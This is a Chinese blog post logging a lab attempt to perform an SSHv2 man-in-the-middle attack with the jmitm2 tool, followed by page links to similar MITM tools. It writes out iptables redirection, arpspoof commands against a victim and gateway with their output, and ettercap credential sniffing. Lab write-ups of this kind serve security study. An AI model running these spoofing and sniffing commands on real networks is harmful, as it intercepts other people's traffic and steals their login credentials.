sshv2 mitm工具jmitm2的使用记录

最新推荐文章于 2024-05-13 09:45:48 发布
最新推荐文章于 2024-05-13 09:45:48 发布
阅读量1.6k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42113498/article/details/81607832
版权

现阶段在试验进行git的中间人攻击,由于大部分用户采用的都是基于sshv2协议的传输,所以问题转变为实现sshv2的中间人攻击。

 

现在网上能查到的关于sshv2中间人攻击的工具有两个,一个是jmitm2,一个德国人编写的,但是零几年之后就没有再更新过了;另一个是ssh-mitm,作者是 Joe Testa。

 

 jmitm2是基于SSH2客户端/服务器实现J2SSHSSH2中间人攻击程序。本文是对试验jmitm2工具的一个记录。

 

受害者主机/攻击者主机系统:Ubuntu 16.04

受害者主机IP:192.168.174.132                 网关:192.168.174.2                     攻击者主机IP:192.168.174.128

1.下载jmitm2。

attack@ubuntu:/home$ wget http://www.david-guembel.de/uploads/media/jmitm2-0.1.0.tar.gz
attack@ubuntu:/home$ tar xf jmitm2-0.1.0.tar.gz
attack@ubuntu:/home$ cd jmitm2-0.1.0/
attack@ubuntu:/home/jmitm2-0.1.0$

2.修改其中的文件内容,改为相应的IP地址和端口号:

attack@ubuntu:/home/jmitm2-0.1.0$ nano bin/conf/server.xml

attack@ubuntu:/home/jmitm2-0.1.0$ nano bin/runm.sh

 

3.流量重定向。欺骗网关和受害者主机,并转发端口。

转发端口:

attack@ubuntu:~$ echo 1 > /proc/sys/net/ipv4/ip_forward
attack@ubuntu:~$ iptables -t nat -A PREROUTING -p tcp --dport 22 -j REDIRECT
attack@ubuntu:~$ iptables -A FORWARD -j ACCEPT

 arp毒化进行欺骗:(root权限)

root@ubuntu:/home/attack# arpspoof -i ens33 -t 192.168.174.132 192.168.174.2
0:c:29:a4:b0:a9 0:c:29:79:b9:66 0806 42: arp reply 192.168.174.2 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:c:29:79:b9:66 0806 42: arp reply 192.168.174.2 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:c:29:79:b9:66 0806 42: arp reply 192.168.174.2 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:c:29:79:b9:66 0806 42: arp reply 192.168.174.2 is-at 0:c:29:a4:b0:a9

root@ubuntu:/home/attack# arpspoof -i ens33 -t 192.168.174.2 192.168.174.132
0:c:29:a4:b0:a9 0:50:56:ec:82:84 0806 42: arp reply 192.168.174.132 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:50:56:ec:82:84 0806 42: arp reply 192.168.174.132 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:50:56:ec:82:84 0806 42: arp reply 192.168.174.132 is-at 0:c:29:a4:b0:a9
0:c:29:a4:b0:a9 0:50:56:ec:82:84 0806 42: arp reply 192.168.174.132 is-at 0:c:29:a4:b0:a9

此时如果使用以下命令,可以成功获取到用户普通情况下的登录口令(以国科大教务系统为例),其中账号和密码打了码。

root@ubuntu:/home/attack# ettercap -Tq -i ens33

可以证明此时的arp毒化是成功的。

然而在arp毒化之前,受害主机可以通过ssh连接git,毒化之后则显示22端口无法连接。这个问题进一步的查询之后确定是防火墙没能将数据包转发出去,但是实验了其他的防火墙规则,也没有成功,这个还需要进一步实验。

4. 按照jmitm2的使用说明和网上能查到的资料,下一步应该是运行runm.sh,但是我的runm.sh打开内容只有长长的一行,而且运行时报错:./runm.sh: 行 1: java: 未找到命令。

暂时怀疑是文件内容有问题,毕竟是很早之前的工具了。

参考链接:https://www.cnblogs.com/woxing/p/3962701.html

http://www.david-guembel.de/index.php?id=6

其中第一个链接中使用了jmitm2,但是他的ssh服务端也在本机,arp直接毒化了服务端,而且最重要的一步“获取密码”没有步骤也没有图,只能作为参考。

第二个链接是jmitm2作者的网站,同样,他的说明更加简洁,具体的操作并没有说明。

另外还查到了第三个链接,https://milo2012.wordpress.com/tag/jmitm2/

作者是认为jmitm2操作很复杂,所以写了一个自动化的脚本,但是这个脚本有错误,同时有很多内容根本没提,导致运行不了。后来又查到了一个关于这个脚本更进一步的资料http://onnocenter.or.id/wiki/index.php/MITM:_mitmssh,解决了tmp/tools的问题,但是依旧报错

Traceback (most recent call last):
  File "mitmSSH.py", line 2, in <module>
    from scapy.all import *
ImportError: No module named scapy.all

所以还需要进一步的查询和测试。

Ygritte_
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
kali linux 下使用ettercap实现MITM中间人攻击
weixin_40501323的博客
12-23 9037
MITM中间人攻击理论: 中间人攻击(Man in theMiddle Attack,简称“MITM 攻击”)是一种间接的入侵攻击。 通过各种技术手段,将入侵者控制的一台计算机,放置在网络连接中的两台通信计算机之间,这台计算机就称为“中间人”。 主机既然被攻击,则说明在传输数据的过程中存在有漏洞。 当主机之间进行通信时,通过封装数据包进而转发到目标主机上。转发的数据包中包括源ip地
sshv2 mitm工具SSH MITM v2.1的使用记录
weixin_42113498的博客
08-14 1773
上一篇记录jmitm2的使用,这一篇记录另一个工具SSH MITM v2.1。 此工具相当于一个OpenSSH v7.5p1源代码的补丁,使其充当受害者与SSH服务器之间的代理。同时,所有明文密码和会话都记录在磁盘上。 1. 首先是进行下载: attack@ubuntu:/home$ git clone https://github.com/jtesta/ssh-mitm.git att...
ssh-mitm:ssh mitm服务器,用于安全审核,支持公钥身份验证,会话劫持和文件操作
03-19
ssh-mitm-拦截ssh流量 中间(mitm)服务器中的人,用于安全审核,支持公钥身份验证,会话劫持和文件操作 给个星星! :star: 这使我有动力开发该工具。谢谢! 0.4.3中的新功能-2021-03-09 与dropbear ssh客户端的兼容性 特征 劫持和记录终端会话 SCP和SFTP 储存档案 替换文件 注入其他文件 代理转发 转发端口 检查和测试客户端是否存在已知漏洞 插件支持 SSH-MITM的安装 使用任何软件包的第一步是正确安装它。 要安装SSH-MITM,只需在您选择的终端中运行以下简单命令: $ pip install ssh-mitm 如果要安装ssh-mitm所有受支持的插件,则可以使用以下命令安装它们: $ pip install ssh-mitm[plugins] 快速开始 使用密码身份验证和会话劫持启动拦截mitm-ssh服务器非常简单。 您所要做的
SSH V2的中间人攻击
lionzl的专栏
01-17 750
中间人攻击(Man-in-the-MiddleAttack,简称“MITM攻击”)中间人攻击很早就成为了黑客常用的一种古老的攻击手段,并且一直到今天还具有极大的扩展空间。 在网络安全方面,MITM攻击的使用是很广泛的,曾经猖獗一时的SMB会话劫持、DNS欺骗等技术都是典型的MITM攻击手段。在黑客技术越来越多的运用于以获取经济利益为目标的情况下时,MITM攻击成为对网银、网游、网上交易等最有威胁并...
探索SSH MITM v2.3-dev:渗透测试的新利器
gitblog_00095的博客
05-13 364
探索SSH MITM v2.3-dev:渗透测试的新利器 项目地址:https://gitcode.com/jtesta/ssh-mitm 作者:资深技术主编 在这个数字化的时代,安全审计和渗透测试是保护网络基础设施的关键步骤。今天,我们要向您介绍一个名为SSH MITM(中间人攻击)的开源工具,它由Joe Testa精心打造,旨在帮助审计员轻松拦截SSH连接,捕获明文密码和会话记录。 项目简介 ...
jmitm2 is a SSH2 man-in-the-middle-attack program based on the SSH2 client/server implementation J2SSH
cnbird's blog
11-01 1227
 Features handles as many connections as you want simultaneously (configurable, default is 10)  uses log4j for flexible logging  speaks SSH2, which all ssh-mitm-attackers I have
Python基于模块Paramiko实现SSHv2协议
09-16
SSHv2协议是网络上广泛使用的安全通信协议,尤其适用于在不同系统之间执行命令、传输文件等操作。 Paramiko库是基于Python的cryptography库构建的,它提供了SSHv2协议的完整实现,包括加密、密钥交换和身份验证等...
python使用paramiko模块通过ssh2协议对交换机进行配置的方法
09-18
Paramiko是一个纯Python实现的SSHv2协议库,它提供了客户端和服务器端的功能,使得在Python中进行SSH连接变得简单。本文将详细讲解如何使用Paramiko模块通过SSH2协议对交换机进行配置。 首先,理解SSH2协议。SSH2是...
paramiko:领先的本地Python SSHv2协议库
02-23
它是用于Python 2.7 / 3.4 +的模块,该模块实现SSH2协议以实现与远程计算机的安全(加密和身份验证)连接。 与SSL(aka TLS)不同,SSH2协议不需要由强大的中央机构签名的分层证书。 您可能知道SSH2是代替Telnet和...
ssh-mitm
weixin_39685022的博客
10-21 334
下载源码 install.sh 包括了下载源码的过程,并且部署在机器上。需要研究一下就脚本是怎么写的。 修改源码后 ,重新部署: sudo ./dev/redeploy.sh 直接重启: sudo ./stop.sh sudo ./start.sh 目前的开发,采用动态库的形式,只需要重启即可。 在start.sh中,拷贝动态库到/usr/lib/ sudo cp …/dist/Debug/GNU-Linux/lib* /usr/lib/. 查看log: a. sudo tail -f..
Python库 | ssh-mitm-0.3.6.tar.gz
04-15
资源分类:Python库 所属语言:Python 资源全名:ssh-mitm-0.3.6.tar.gz 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
使用SSHMitm中间人拦截SSH
单核CPU的小朋友的博客
04-02 4366
使用SSHMitm中间人拦截SSH 网络拓扑: 靶机:metasploitable2-linux 攻击机:kali-linux 访问者:backtrack5-linux Kali使用ettercap进行中间人攻击(arp欺骗): 本处使用ssh登陆远程服务器 但是kali没有抓到任何包 进行服务版本号扫描判断原因 发现版本号为 Openssh4.7,理论上是可以攻击的。但是由于采用了protocol 2版本,所有的信息都是加密的,这里我们采用arpspoof的方法进行中间人攻击来抓包验证。
来自GitHub的系列渗透测试工具
程序员阿飘 的博客
02-04 1708
没学过的同学也不要慌,可以去B站搜索相关视频,你搜关键词网络安全工程师会出现很多相关的视频教程,我粗略的看了一下,排名第一的视频就讲的很详细。Kaitai Struct - 文件格式和网络协议剖析语言和Web IDE,使用C ++,C#,Java,JavaScript,Perl,PHP,Python,Ruby生成解析器。也有免费版,IDA 免费。THC Hydra - 在线密码破解工具,内置支持许多网络协议,包括HTTP,SMB,FTP,telnet,ICQ,MySQL,LDAP,IMAP,VNC等。
网络安全基础知识点
baidu_38876334的博客
03-27 857
网络安全是为数据处理系统建立和采用的技术和管理的安全保护,保护计算机硬件、软件和数据不因偶然和恶意的原因遭到破坏、更改和泄露。
探索SSH MITM:揭秘网络调试神器
gitblog_00077的博客
04-09 446
探索SSH MITM:揭秘网络调试神器 项目地址:https://gitcode.com/ssh-mitm/ssh-mitm 项目简介 SSH MITM 是一个强大的工具,用于进行SSH(Secure Shell)中间人攻击(Man-in-the-Middle, MITM)。它允许开发者在不修改原始客户端或服务器设置的情况下,拦截并查看或修改SSH通信过程中的数据流量。这个项目对于网络调试、安全测...
SSH协议弱加密算法漏洞的利用及复现(中间人攻击)
热门推荐
qq_32006199的博客
04-10 1万+
SSH协议弱加密算法漏洞的利用及复现(中间人攻击) 很多服务器或者交换机是存在SSH协议弱加密算法漏洞的,但是该漏洞如何利用呢?最近研究了下此漏洞的相关利用方法,对其整个攻击过程进行了复现。哈哈,本文具体操作步骤适合小白操作,也欢迎大神指正,希望大神对于此漏洞利用提出一些想法或者更好,更便捷的方法,促进交流哈!
SSH2 “MITM” like attack with JMITM2
cnbird's blog
08-05 903
First: the following attack is not a real (at least not a perfect) man-in-the-middle attack, since the target will get a warning about the altered SSH server footprint and the attacker needs to “hijac
sshv1和sshv2
最新发布
06-18
SSH(Secure Shell)是用于远程登录和传输数据的安全协议。SSH最初有两个主要版本:SSHv1(Secure Shell Version 1)和SSHv2(Secure Shell Version 2)。 1. SSHv1:这是SSH协议的早期版本,发布于1999年。SSHv1提供了加密的身份验证、命令传输和文件传输功能。尽管它是最早的版本,但在安全性和性能方面相比SSHv2有所限制。SSHv1存在一些已知的安全漏洞,使得它不再推荐使用,尤其是在生产环境中,因为攻击者可能会利用这些漏洞发起攻击。 2. SSHv2:发布于2002年,是对SSHv1的重大改进。SSHv2在安全性上有了显著增强,包括更强的数据加密算法(如AES),以及更好的完整性检查和身份验证机制。此外,SSHv2还支持更复杂的身份认证方法,如密钥对认证、口令和Kerberos认证等。性能上,SSHv2也进行了优化,提高了数据传输速率。由于这些优势,SSHv2已成为现代网络中广泛使用的标准版本,几乎所有的新系统和服务器都会支持SSHv2。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值